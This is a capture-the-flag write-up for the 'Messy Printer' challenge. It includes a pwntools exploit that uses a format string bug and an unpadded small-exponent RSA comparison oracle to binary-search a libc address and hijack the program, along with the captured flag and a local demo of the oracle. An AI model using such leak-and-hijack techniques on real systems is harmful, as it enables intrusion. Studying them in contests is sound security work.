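# Messy Printer

Source code is provided for this program. The goal is to leak the libc base address.

- There is a format string bug (FSB), but the output is encrypted with RSA.
- => The RSA is vulnerable since it doesn't use padding, but the source also does this:

> // if n / 2 > plaintext
> // then plaintext = n - plaintext

- For a short string such as an address, the difference between two plaintexts is kept in their ciphertexts when e is small.
- => First send a guessed address as the title, then use the FSB to print the libc address as the content.
- => Compare the two ciphertexts: if the ciphertext of the guess is larger, the guess is too small.
- => Binary search.

```python
from pwn import *
from Crypto.Util.number import bytes_to_long

r = remote('eofqual.zoolab.org', 4001)
# r = process('./messy_printer')


def try_if_same(data1, data2):
    """Send a title and a content; return both encrypted outputs as integers."""
    r.sendafter(b'[y/n]: \n', b'y')
    r.sendlineafter(b'Give me title: \n', data1)
    d1 = r.recvuntil(b'\nGive me ')[:-9]      # strip the trailing prompt
    r.sendlineafter(b'content: \n', data2)
    d2 = r.recvuntil(b'\nContinue? ')[:-11]   # strip the trailing prompt
    return bytes_to_long(d1), bytes_to_long(d2)


t = 0x7f0000000000   # current guess
s = 0x8000000000     # current step, halved every round
while True:
    # a: ciphertext of the guessed address, b: ciphertext of the leaked address
    a, b = try_if_same(hex(t).encode(), b"%21$p")
    if a == b:
        break
    elif a > b:      # larger ciphertext => guess is too small
        t += s
    else:
        t -= s
    s = s // 2
t += s
input()              # wait for Enter before continuing
r.sendafter(b'[y/n]: \n', b'n')
print(hex(t))
# leaked address - 0x270b3 + 0x55410 (offsets used in this write-up)
r.sendafter(b'Give me the magic: \n', p64(t - 0x270b3 + 0x55410))
r.interactive()
```

FLAG{CONGRATS!_However_this_should_be_the_easiest_one...}

###### tags: `solved`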
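Added example (not part of the original write-up or the challenge source): a local model of why comparing two ciphertexts is enough to recover the plaintext when RSA is used without padding and with a small e. The modulus `N`, the exponent `E = 3`, the search range and the address `SECRET` are constructed for the demonstration; the flip in `encrypt` follows the quoted source comment.

```python
# Constructed demo key: product of two Mersenne primes. Not the challenge's key.
N = (2**521 - 1) * (2**607 - 1)
E = 3  # assumed small public exponent


def encrypt(msg: bytes) -> int:
    """Unpadded RSA with the flip from the quoted comment."""
    m = int.from_bytes(msg, "big")
    if m < N // 2:
        m = N - m
    # For a short msg, m**E < N, so the result is exactly N - m**E:
    # no modular wrap-around happens and the ciphertext falls as m rises.
    return pow(m, E, N)


def recover(target: int, lo: int, hi: int):
    """Find the address whose hex string encrypts to `target`,
    using only ciphertext comparisons. Returns (address, queries)."""
    queries = 0
    while lo <= hi:
        mid = (lo + hi) // 2
        c = encrypt(hex(mid).encode())
        queries += 1
        if c == target:        # deterministic: same plaintext, same ciphertext
            return mid, queries
        if c > target:         # larger ciphertext => guess is too small
            lo = mid + 1
        else:
            hi = mid - 1
    raise ValueError("address not in range")


SECRET = 0x7f3a5c1270b3                      # constructed sample address
LO, HI = 0x7e0000000000, 0x7fffffffffff      # all guesses print as 14 characters

if __name__ == "__main__":
    leaked = encrypt(hex(SECRET).encode())   # what the encrypted "%p" output would be
    addr, n = recover(leaked, LO, HI)
    print(hex(addr), "recovered in", n, "comparisons")
```

Randomised padding such as RSA-OAEP makes two encryptions of the same plaintext differ and removes this ordering, so neither the equality test nor the comparison works against it.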